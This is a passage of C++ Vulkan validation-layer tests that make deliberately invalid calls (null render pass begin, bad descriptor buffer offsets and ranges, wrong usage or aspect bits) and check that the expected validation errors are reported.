m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "vkCmdBeginRenderPass: required parameter pRenderPassBegin specified as NULL"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_commandBuffer->begin(); // Don't care about RenderPass handle b/c error should be flagged before // that vk::CmdBeginRenderPass(m_commandBuffer->handle(), NULL, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->VerifyFound(); m_commandBuffer->end(); } TEST_F(VkLayerTest, EndCommandBufferWithinRenderPass) { TEST_DESCRIPTION("End a command buffer with an active render pass"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkEndCommandBuffer-commandBuffer-00060"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::EndCommandBuffer(m_commandBuffer->handle()); m_errorMonitor->VerifyFound(); // End command buffer properly to avoid driver issues. This is safe -- the // previous vk::EndCommandBuffer should not have reached the driver. 
m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // TODO: Add test for VK_COMMAND_BUFFER_LEVEL_SECONDARY // TODO: Add test for VK_COMMAND_BUFFER_USAGE_RENDER_PASS_CONTINUE_BIT } TEST_F(VkLayerTest, DSUsageBitsErrors) { TEST_DESCRIPTION("Attempt to update descriptor sets for images and buffers that do not have correct usage bits sets."); ASSERT_NO_FATAL_FAILURE(Init()); const VkFormat buffer_format = VK_FORMAT_R8_UNORM; VkFormatProperties format_properties; vk::GetPhysicalDeviceFormatProperties(gpu(), buffer_format, &format_properties); if (!(format_properties.bufferFeatures & VK_FORMAT_FEATURE_STORAGE_TEXEL_BUFFER_BIT)) { printf("%s Device does not support VK_FORMAT_FEATURE_STORAGE_TEXEL_BUFFER_BIT for this format; skipped.\n", kSkipPrefix); return; } std::array<VkDescriptorPoolSize, VK_DESCRIPTOR_TYPE_RANGE_SIZE> ds_type_count; for (uint32_t i = 0; i < ds_type_count.size(); ++i) { ds_type_count[i].type = VkDescriptorType(i); ds_type_count[i].descriptorCount = 1; } vk_testing::DescriptorPool ds_pool; ds_pool.init(*m_device, vk_testing::DescriptorPool::create_info(0, VK_DESCRIPTOR_TYPE_RANGE_SIZE, ds_type_count)); ASSERT_TRUE(ds_pool.initialized()); std::vector<VkDescriptorSetLayoutBinding> dsl_bindings(1); dsl_bindings[0].binding = 0; dsl_bindings[0].descriptorType = VkDescriptorType(0); dsl_bindings[0].descriptorCount = 1; dsl_bindings[0].stageFlags = VK_SHADER_STAGE_ALL; dsl_bindings[0].pImmutableSamplers = NULL; // Create arrays of layout and descriptor objects using UpDescriptorSet = std::unique_ptr<vk_testing::DescriptorSet>; std::vector<UpDescriptorSet> descriptor_sets; using UpDescriptorSetLayout = std::unique_ptr<VkDescriptorSetLayoutObj>; std::vector<UpDescriptorSetLayout> ds_layouts; descriptor_sets.reserve(VK_DESCRIPTOR_TYPE_RANGE_SIZE); ds_layouts.reserve(VK_DESCRIPTOR_TYPE_RANGE_SIZE); for (uint32_t i = 0; i < VK_DESCRIPTOR_TYPE_RANGE_SIZE; ++i) { dsl_bindings[0].descriptorType = VkDescriptorType(i); ds_layouts.push_back(UpDescriptorSetLayout(new VkDescriptorSetLayoutObj(m_device, dsl_bindings))); descriptor_sets.push_back(UpDescriptorSet(ds_pool.alloc_sets(*m_device, *ds_layouts.back()))); ASSERT_TRUE(descriptor_sets.back()->initialized()); } // Create a buffer & bufferView to be used for invalid updates const VkDeviceSize buffer_size = 256; uint8_t data[buffer_size]; VkConstantBufferObj buffer(m_device, buffer_size, data, VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT); VkConstantBufferObj storage_texel_buffer(m_device, buffer_size, data, VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT); ASSERT_TRUE(buffer.initialized() && storage_texel_buffer.initialized()); auto buff_view_ci = vk_testing::BufferView::createInfo(buffer.handle(), VK_FORMAT_R8_UNORM); vk_testing::BufferView buffer_view_obj, storage_texel_buffer_view_obj; buffer_view_obj.init(*m_device, buff_view_ci); buff_view_ci.buffer = storage_texel_buffer.handle(); storage_texel_buffer_view_obj.init(*m_device, buff_view_ci); ASSERT_TRUE(buffer_view_obj.initialized() && storage_texel_buffer_view_obj.initialized()); VkBufferView buffer_view = buffer_view_obj.handle(); VkBufferView storage_texel_buffer_view = storage_texel_buffer_view_obj.handle(); // Create an image to be used for invalid updates VkImageObj image_obj(m_device); image_obj.InitNoLayout(64, 64, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image_obj.initialized()); VkImageView image_view = image_obj.targetView(VK_FORMAT_R8G8B8A8_UNORM); VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = 
buffer.handle(); VkDescriptorImageInfo img_info = {}; img_info.imageView = image_view; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.pTexelBufferView = &buffer_view; descriptor_write.pBufferInfo = &buff_info; descriptor_write.pImageInfo = &img_info; // These error messages align with VkDescriptorType struct std::string error_codes[] = { "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // placeholder, no error for SAMPLER descriptor "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // COMBINED_IMAGE_SAMPLER "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // SAMPLED_IMAGE "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // STORAGE_IMAGE "VUID-VkWriteDescriptorSet-descriptorType-00334", // UNIFORM_TEXEL_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00335", // STORAGE_TEXEL_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00330", // UNIFORM_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00331", // STORAGE_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00330", // UNIFORM_BUFFER_DYNAMIC "VUID-VkWriteDescriptorSet-descriptorType-00331", // STORAGE_BUFFER_DYNAMIC "UNASSIGNED-CoreValidation-DrawState-InvalidImageView" // INPUT_ATTACHMENT }; // Start loop at 1 as SAMPLER desc type has no usage bit error for (uint32_t i = 1; i < VK_DESCRIPTOR_TYPE_RANGE_SIZE; ++i) { if (VkDescriptorType(i) == VK_DESCRIPTOR_TYPE_UNIFORM_TEXEL_BUFFER) { // Now check for UNIFORM_TEXEL_BUFFER using storage_texel_buffer_view descriptor_write.pTexelBufferView = &storage_texel_buffer_view; } descriptor_write.descriptorType = VkDescriptorType(i); descriptor_write.dstSet = descriptor_sets[i]->handle(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error_codes[i]); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); if (VkDescriptorType(i) == VK_DESCRIPTOR_TYPE_UNIFORM_TEXEL_BUFFER) { descriptor_write.pTexelBufferView = &buffer_view; } } } TEST_F(VkLayerTest, DSBufferInfoErrors) { TEST_DESCRIPTION( "Attempt to update buffer descriptor set that has incorrect parameters in VkDescriptorBufferInfo struct. This includes:\n" "1. offset value greater than or equal to buffer size\n" "2. range value of 0\n" "3. 
range value greater than buffer (size - offset)"); // GPDDP2 needed for push descriptors support below bool gpdp2_support = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_SPEC_VERSION); if (gpdp2_support) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool update_template_support = DeviceExtensionSupported(gpu(), nullptr, VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME); if (update_template_support) { m_device_extension_names.push_back(VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME); } else { printf("%s Descriptor Update Template Extensions not supported, template cases skipped.\n", kSkipPrefix); } // Note: Includes workaround for some implementations which incorrectly return 0 maxPushDescriptors bool push_descriptor_support = gpdp2_support && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME) && (GetPushDescriptorProperties(instance(), gpu()).maxPushDescriptors > 0); if (push_descriptor_support) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); } else { printf("%s Push Descriptor Extension not supported, push descriptor cases skipped.\n", kSkipPrefix); } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); std::vector<VkDescriptorSetLayoutBinding> ds_bindings = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}}; OneOffDescriptorSet descriptor_set(m_device, ds_bindings); // Create a buffer to be used for invalid updates VkBufferCreateInfo buff_ci = {}; buff_ci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buff_ci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buff_ci.size = m_device->props.limits.minUniformBufferOffsetAlignment; buff_ci.sharingMode = VK_SHARING_MODE_EXCLUSIVE; VkBufferObj buffer; buffer.init(*m_device, buff_ci); VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer.handle(); VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.pTexelBufferView = nullptr; descriptor_write.pBufferInfo = &buff_info; descriptor_write.pImageInfo = nullptr; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.dstSet = descriptor_set.set_; // Relying on the "return nullptr for non-enabled extensions auto vkCreateDescriptorUpdateTemplateKHR = (PFN_vkCreateDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkCreateDescriptorUpdateTemplateKHR"); auto vkDestroyDescriptorUpdateTemplateKHR = (PFN_vkDestroyDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkDestroyDescriptorUpdateTemplateKHR"); auto vkUpdateDescriptorSetWithTemplateKHR = (PFN_vkUpdateDescriptorSetWithTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkUpdateDescriptorSetWithTemplateKHR"); if (update_template_support) { ASSERT_NE(vkCreateDescriptorUpdateTemplateKHR, nullptr); ASSERT_NE(vkDestroyDescriptorUpdateTemplateKHR, nullptr); ASSERT_NE(vkUpdateDescriptorSetWithTemplateKHR, nullptr); } // Setup for update w/ template tests // Create a template of descriptor set updates struct SimpleTemplateData { uint8_t padding[7]; VkDescriptorBufferInfo buff_info; uint32_t other_padding[4]; }; SimpleTemplateData update_template_data = {}; VkDescriptorUpdateTemplateEntry update_template_entry = {}; 
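    // The template entry below maps the single UNIFORM_BUFFER descriptor to SimpleTemplateData::buff_info, so
    // template-based updates read the VkDescriptorBufferInfo from that offset within the padded struct.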
update_template_entry.dstBinding = 0; update_template_entry.dstArrayElement = 0; update_template_entry.descriptorCount = 1; update_template_entry.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; update_template_entry.offset = offsetof(SimpleTemplateData, buff_info); update_template_entry.stride = sizeof(SimpleTemplateData); auto update_template_ci = lvl_init_struct<VkDescriptorUpdateTemplateCreateInfoKHR>(); update_template_ci.descriptorUpdateEntryCount = 1; update_template_ci.pDescriptorUpdateEntries = &update_template_entry; update_template_ci.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_DESCRIPTOR_SET; update_template_ci.descriptorSetLayout = descriptor_set.layout_.handle(); VkDescriptorUpdateTemplate update_template = VK_NULL_HANDLE; if (update_template_support) { auto result = vkCreateDescriptorUpdateTemplateKHR(m_device->device(), &update_template_ci, nullptr, &update_template); ASSERT_VK_SUCCESS(result); } // VK_KHR_push_descriptor support auto vkCmdPushDescriptorSetKHR = (PFN_vkCmdPushDescriptorSetKHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdPushDescriptorSetKHR"); auto vkCmdPushDescriptorSetWithTemplateKHR = (PFN_vkCmdPushDescriptorSetWithTemplateKHR)vk::GetDeviceProcAddr( m_device->device(), "vkCmdPushDescriptorSetWithTemplateKHR"); std::unique_ptr<VkDescriptorSetLayoutObj> push_dsl = nullptr; std::unique_ptr<VkPipelineLayoutObj> pipeline_layout = nullptr; VkDescriptorUpdateTemplate push_template = VK_NULL_HANDLE; if (push_descriptor_support) { ASSERT_NE(vkCmdPushDescriptorSetKHR, nullptr); push_dsl.reset( new VkDescriptorSetLayoutObj(m_device, ds_bindings, VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR)); pipeline_layout.reset(new VkPipelineLayoutObj(m_device, {push_dsl.get()})); ASSERT_TRUE(push_dsl->initialized()); if (update_template_support) { ASSERT_NE(vkCmdPushDescriptorSetWithTemplateKHR, nullptr); auto push_template_ci = lvl_init_struct<VkDescriptorUpdateTemplateCreateInfoKHR>(); push_template_ci.descriptorUpdateEntryCount = 1; push_template_ci.pDescriptorUpdateEntries = &update_template_entry; push_template_ci.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_PUSH_DESCRIPTORS_KHR; push_template_ci.descriptorSetLayout = VK_NULL_HANDLE; push_template_ci.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; push_template_ci.pipelineLayout = pipeline_layout->handle(); push_template_ci.set = 0; auto result = vkCreateDescriptorUpdateTemplateKHR(m_device->device(), &push_template_ci, nullptr, &push_template); ASSERT_VK_SUCCESS(result); } } auto do_test = [&](const char *desired_failure) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); if (push_descriptor_support) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); m_commandBuffer->begin(); vkCmdPushDescriptorSetKHR(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout->handle(), 0, 1, &descriptor_write); m_commandBuffer->end(); m_errorMonitor->VerifyFound(); } if (update_template_support) { update_template_data.buff_info = buff_info; // copy the test case information into our "pData" m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); vkUpdateDescriptorSetWithTemplateKHR(m_device->device(), descriptor_set.set_, update_template, &update_template_data); m_errorMonitor->VerifyFound(); if (push_descriptor_support) { 
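            // Push the same invalid buffer info through the push-descriptor-with-template path and expect the identical failure.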
m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); m_commandBuffer->begin(); vkCmdPushDescriptorSetWithTemplateKHR(m_commandBuffer->handle(), push_template, pipeline_layout->handle(), 0, &update_template_data); m_commandBuffer->end(); m_errorMonitor->VerifyFound(); } } }; // Cause error due to offset out of range buff_info.offset = buff_ci.size; buff_info.range = VK_WHOLE_SIZE; do_test("VUID-VkDescriptorBufferInfo-offset-00340"); // Now cause error due to range of 0 buff_info.offset = 0; buff_info.range = 0; do_test("VUID-VkDescriptorBufferInfo-range-00341"); // Now cause error due to range exceeding buffer size - offset buff_info.offset = 0; buff_info.range = buff_ci.size + 1; do_test("VUID-VkDescriptorBufferInfo-range-00342"); if (update_template_support) { vkDestroyDescriptorUpdateTemplateKHR(m_device->device(), update_template, nullptr); if (push_descriptor_support) { vkDestroyDescriptorUpdateTemplateKHR(m_device->device(), push_template, nullptr); } } } TEST_F(VkLayerTest, DSBufferLimitErrors) { TEST_DESCRIPTION( "Attempt to update buffer descriptor set that has VkDescriptorBufferInfo values that violate device limits.\n" "Test cases include:\n" "1. range of uniform buffer update exceeds maxUniformBufferRange\n" "2. offset of uniform buffer update is not multiple of minUniformBufferOffsetAlignment\n" "3. using VK_WHOLE_SIZE with uniform buffer size exceeding maxUniformBufferRange\n" "4. range of storage buffer update exceeds maxStorageBufferRange\n" "5. offset of storage buffer update is not multiple of minStorageBufferOffsetAlignment\n" "6. using VK_WHOLE_SIZE with storage buffer size exceeding maxStorageBufferRange"); ASSERT_NO_FATAL_FAILURE(Init()); struct TestCase { VkDescriptorType descriptor_type; VkBufferUsageFlagBits buffer_usage; VkDeviceSize max_range; std::string max_range_vu; VkDeviceSize min_align; std::string min_align_vu; }; for (const auto &test_case : { TestCase({VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, m_device->props.limits.maxUniformBufferRange, "VUID-VkWriteDescriptorSet-descriptorType-00332", m_device->props.limits.minUniformBufferOffsetAlignment, "VUID-VkWriteDescriptorSet-descriptorType-00327"}), TestCase({VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, VK_BUFFER_USAGE_STORAGE_BUFFER_BIT, m_device->props.limits.maxStorageBufferRange, "VUID-VkWriteDescriptorSet-descriptorType-00333", m_device->props.limits.minStorageBufferOffsetAlignment, "VUID-VkWriteDescriptorSet-descriptorType-00328"}), }) { // Create layout with single buffer OneOffDescriptorSet descriptor_set(m_device, { {0, test_case.descriptor_type, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create a buffer to be used for invalid updates VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = test_case.buffer_usage; bci.size = test_case.max_range + test_case.min_align; // Make buffer bigger than range limit bci.sharingMode = VK_SHARING_MODE_EXCLUSIVE; VkBuffer buffer; VkResult err = vk::CreateBuffer(m_device->device(), &bci, NULL, &buffer); ASSERT_VK_SUCCESS(err); // Have to bind memory to buffer before descriptor update VkMemoryRequirements mem_reqs; vk::GetBufferMemoryRequirements(m_device->device(), buffer, &mem_reqs); VkMemoryAllocateInfo mem_alloc = {}; mem_alloc.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; mem_alloc.pNext = NULL; mem_alloc.allocationSize = mem_reqs.size; bool pass = m_device->phy().set_memory_type(mem_reqs.memoryTypeBits, &mem_alloc, 0); if (!pass) { printf("%s Failed to allocate memory in 
DSBufferLimitErrors; skipped.\n", kSkipPrefix); vk::DestroyBuffer(m_device->device(), buffer, NULL); continue; } VkDeviceMemory mem; err = vk::AllocateMemory(m_device->device(), &mem_alloc, NULL, &mem); if (VK_SUCCESS != err) { printf("%s Failed to allocate memory in DSBufferLimitErrors; skipped.\n", kSkipPrefix); vk::DestroyBuffer(m_device->device(), buffer, NULL); continue; } err = vk::BindBufferMemory(m_device->device(), buffer, mem, 0); ASSERT_VK_SUCCESS(err); VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.pTexelBufferView = nullptr; descriptor_write.pBufferInfo = &buff_info; descriptor_write.pImageInfo = nullptr; descriptor_write.descriptorType = test_case.descriptor_type; descriptor_write.dstSet = descriptor_set.set_; // Exceed range limit if (test_case.max_range != UINT32_MAX) { buff_info.range = test_case.max_range + 1; buff_info.offset = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test_case.max_range_vu); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); } // Reduce size of range to acceptable limit and cause offset error if (test_case.min_align > 1) { buff_info.range = test_case.max_range; buff_info.offset = test_case.min_align - 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test_case.min_align_vu); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); } // Exceed effective range limit by using VK_WHOLE_SIZE buff_info.range = VK_WHOLE_SIZE; buff_info.offset = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test_case.max_range_vu); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // Cleanup vk::FreeMemory(m_device->device(), mem, NULL); vk::DestroyBuffer(m_device->device(), buffer, NULL); } } TEST_F(VkLayerTest, DSAspectBitsErrors) { TEST_DESCRIPTION("Attempt to update descriptor sets for images that do not have correct aspect bits sets."); VkResult err; // Enable KHR multiplane req'd extensions bool mp_extensions = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME, VK_KHR_GET_MEMORY_REQUIREMENTS_2_SPEC_VERSION); if (mp_extensions) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE1_EXTENSION_NAME); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_GET_MEMORY_REQUIREMENTS_2_EXTENSION_NAME); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_BIND_MEMORY_2_EXTENSION_NAME); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_SAMPLER_YCBCR_CONVERSION_EXTENSION_NAME); if (mp_extensions) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE1_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_GET_MEMORY_REQUIREMENTS_2_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_BIND_MEMORY_2_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_SAMPLER_YCBCR_CONVERSION_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitState()); auto depth_format = FindSupportedDepthStencilFormat(gpu()); if 
(!depth_format) { printf("%s No Depth + Stencil format found. Skipped.\n", kSkipPrefix); } else { OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create an image to be used for invalid updates VkImageObj image_obj(m_device); VkFormatProperties format_props; vk::GetPhysicalDeviceFormatProperties(m_device->phy().handle(), depth_format, &format_props); if (!image_obj.IsCompatible(VK_IMAGE_USAGE_SAMPLED_BIT, format_props.optimalTilingFeatures)) { printf("%s Depth + Stencil format cannot be sampled with optimalTiling. Skipped.\n", kSkipPrefix); } else { image_obj.Init(64, 64, 1, depth_format, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(image_obj.initialized()); VkImage image = image_obj.image(); // Now create view for image VkImageViewCreateInfo image_view_ci = {}; image_view_ci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_ci.image = image; image_view_ci.format = depth_format; image_view_ci.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_ci.subresourceRange.layerCount = 1; image_view_ci.subresourceRange.baseArrayLayer = 0; image_view_ci.subresourceRange.levelCount = 1; // Setting both depth & stencil aspect bits is illegal for an imageView used // to populate a descriptor set. image_view_ci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; VkImageView image_view; err = vk::CreateImageView(m_device->device(), &image_view_ci, NULL, &image_view); ASSERT_VK_SUCCESS(err); descriptor_set.WriteDescriptorImageInfo(0, image_view, VK_NULL_HANDLE, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT); const char *error_msg = "VUID-VkDescriptorImageInfo-imageView-01976"; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error_msg); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroyImageView(m_device->device(), image_view, NULL); } } if (!mp_extensions) { printf("%s test requires KHR multiplane extensions, not available. Skipping.\n", kSkipPrefix); } else { OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkFormat mp_format = VK_FORMAT_G8_B8R8_2PLANE_420_UNORM; // commonly supported multi-planar format VkImageObj image_obj(m_device); VkFormatProperties format_props; vk::GetPhysicalDeviceFormatProperties(m_device->phy().handle(), mp_format, &format_props); if (!image_obj.IsCompatible(VK_IMAGE_USAGE_SAMPLED_BIT, format_props.optimalTilingFeatures)) { printf("%s multi-planar format cannot be sampled for optimalTiling. 
Skipped.\n", kSkipPrefix); } else { VkImageCreateInfo image_ci = {VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO, nullptr, VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT, // need for multi-planar VK_IMAGE_TYPE_2D, mp_format, {64, 64, 1}, 1, 1, VK_SAMPLE_COUNT_1_BIT, VK_IMAGE_TILING_OPTIMAL, VK_IMAGE_USAGE_SAMPLED_BIT, VK_SHARING_MODE_EXCLUSIVE, 0, nullptr, VK_IMAGE_LAYOUT_UNDEFINED}; image_obj.init(&image_ci); ASSERT_TRUE(image_obj.initialized()); VkImageView image_view = image_obj.targetView(mp_format, VK_IMAGE_ASPECT_COLOR_BIT); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorImageInfo-sampler-01564"); descriptor_set.WriteDescriptorImageInfo(0, image_view, sampler, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } } } TEST_F(VkLayerTest, DSTypeMismatch) { // Create DS w/ layout of one type and attempt Update w/ mis-matched type VkResult err; m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, " binding #0 with type VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER but update type is VK_DESCRIPTOR_TYPE_SAMPLER"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); descriptor_set.WriteDescriptorImageInfo(0, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, DSUpdateOutOfBounds) { // For overlapping Update, have arrayIndex exceed that of layout m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkBufferTest buffer_test(m_device, VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT); if (!buffer_test.GetBufferCurrent()) { // Something prevented creation of buffer so abort printf("%s Buffer creation failed, skipping test\n", kSkipPrefix); return; } // Correctly update descriptor to avoid "NOT_UPDATED" error VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer_test.GetBuffer(); buff_info.offset = 0; buff_info.range = 1024; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstArrayElement = 1; /* This index out of bounds for the update */ descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.pBufferInfo = &buff_info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidDSUpdateIndex) { // Create layout w/ count of 1 and attempt update to that layout w/ binding index 2 VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstBinding-00315"); 
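    // The layout below declares only a single descriptor at binding 0, so the write to binding 2 is out of range and
    // should trigger the VUID set above.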
    ASSERT_NO_FATAL_FAILURE(Init());
    OneOffDescriptorSet descriptor_set(m_device, {
                                                     {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr},
                                                 });

